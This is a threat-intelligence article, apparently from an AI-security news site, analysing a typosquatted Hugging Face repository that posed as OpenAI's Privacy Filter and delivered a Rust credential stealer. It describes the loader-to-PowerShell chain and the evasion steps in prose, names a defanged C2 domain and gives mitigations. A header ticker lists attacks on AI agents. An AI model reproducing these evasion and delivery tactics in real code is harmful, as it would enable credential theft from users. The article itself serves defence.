LIVE THREATS
HIGH Fake OpenAI Repository on Hugging Face Delivers Rust-Based Infostealer // HIGH ClaudeBleed Flaw Lets Rogue Chrome Extensions Hijack AI Agent // HIGH Claude Mythos AI-Assisted Fuzzing Uncovers 423 Firefox Security Bugs in One Month // HIGH Fake Claude AI Site Used to Distribute Beagle Backdoor and PlugX Malware // HIGH Malicious Repos Trigger Silent Code Execution in Claude, Cursor, Gemini CLIs // HIGH Mitiga Labs: MCP Hijack Attack Steals Claude Code OAuth Tokens via Silent … // HIGH Pixel-Level Perturbations Enable Invisible Prompt Injection in Vision-Language Models // CRITICAL Prompt Injection Achieves Remote Code Execution in Semantic Kernel Agent Framework // HIGH Unmanaged AI Agents Expose Enterprise Identity Perimeters to Silent Compromise // CRITICAL Bleeding Llama Flaw Exposes 300,000 Ollama Servers to Unauthenticated Data Theft //
ATLAS OWASP HIGH Significant risk · Prioritise patching RELEVANCE ▲ 8.2

Fake OpenAI Repository on Hugging Face Delivers Rust-Based Infostealer

TL;DR HIGH
  • What happened: Typosquatted Hugging Face repo impersonating OpenAI delivered Rust infostealer to 244,000 downloaders.
  • Who's at risk: AI/ML developers and researchers who install models from Hugging Face without verifying repository authenticity are most exposed.
  • Act now: Audit any recently installed Hugging Face packages, especially those referencing OpenAI projects · Implement code review of loader scripts before executing any downloaded ML repository files · Enforce allowlists for trusted Hugging Face organisations and verify model card authenticity before download
Fake OpenAI Repository on Hugging Face Delivers Rust-Based Infostealer

Overview

A threat actor created a fraudulent Hugging Face repository named Open-OSS/privacy-filter that typosquatted OpenAI’s legitimate ‘Privacy Filter’ project. Discovered by HiddenLayer researchers on May 7, 2026, the repository briefly reached the #1 spot on Hugging Face’s trending list and recorded approximately 244,000 downloads before the platform removed it following reports. The campaign demonstrates how adversaries are actively exploiting the trust and discoverability mechanics of AI model-sharing platforms to distribute malware at scale.

Technical Analysis

The attack employed a multi-stage delivery chain designed to evade detection:

  1. Lure Layer: The repository copied OpenAI’s legitimate model card nearly verbatim, presenting a convincing facade to researchers and developers browsing trending AI tools.

  2. Loader Script (loader.py): A Python file included superficial AI-related code for camouflage. Behind this facade, it:

    • Disabled SSL certificate verification
    • Decoded a base64-encoded URL pointing to an external resource
    • Fetched and executed a JSON payload containing an embedded PowerShell command
  3. PowerShell Stage: Executed silently in a hidden window, the command downloaded start.bat, which:

    • Performed privilege escalation
    • Downloaded the final payload (sefirah)
    • Added the payload to Microsoft Defender’s exclusion list
    • Executed the payload
  4. Final Payload — Rust Infostealer (sefirah): A capable Rust-based credential harvester targeting:

    • Browser data (cookies, passwords, session tokens, encryption keys) from Chromium and Gecko browsers
    • Discord tokens, local databases, and master keys
    • Cryptocurrency wallets and wallet browser extensions
    • SSH, FTP, and VPN credentials including FileZilla configurations
    • Sensitive local files and wallet seeds/keys
    • System information and multi-monitor screenshots

Stolen data is compressed and exfiltrated to a C2 server at recargapopular[.]com. The malware also incorporates extensive anti-analysis capabilities, including VM, sandbox, and debugger detection.

Framework Mapping

  • AML.T0010 — ML Supply Chain Compromise: The attack directly targets the AI/ML development pipeline by weaponising a trusted model-sharing platform to distribute malicious packages.
  • AML.T0019 — Publish Poisoned Datasets/Repositories: The adversary published a poisoned repository with a near-identical model card to deceive users.
  • AML.T0047 — ML-Enabled Product or Service: The attack exploits user trust in legitimate AI tooling ecosystems.
  • LLM05 — Supply Chain Vulnerabilities: The incident is a textbook example of third-party AI component compromise through a trusted distribution channel.

Impact Assessment

With 244,000 downloads recorded before removal, the potential victim pool is significant. Any Windows user who installed and executed code from this repository may have had browser credentials, cryptocurrency assets, SSH/VPN configurations, and session tokens exfiltrated. The attack is particularly dangerous for AI researchers, MLOps engineers, and developers who routinely install packages from Hugging Face as part of their workflow and may not scrutinise loader scripts closely.

Mitigation & Recommendations

  • Immediate: Check systems for the presence of sefirah or related artefacts; rotate all credentials stored in affected browsers and SSH/VPN configurations.
  • Network: Block connections to recargapopular[.]com and monitor for outbound traffic to unknown C2 infrastructure.
  • Process: Establish code review requirements for any Python scripts (loader.py patterns) downloaded from ML repositories before execution.
  • Platform Hygiene: Only install models from verified organisations on Hugging Face; cross-reference repositories against official vendor GitHub/documentation links.
  • Detection: Deploy behavioural monitoring for PowerShell execution spawned from Python processes, particularly those running in hidden windows.

References

◉ AI THREAT BRIEFING

Stay ahead of the threat.

Twice-weekly digest of critical AI security developments — every story mapped to MITRE ATLAS and OWASP LLM Top 10. Free.

No spam. Unsubscribe anytime.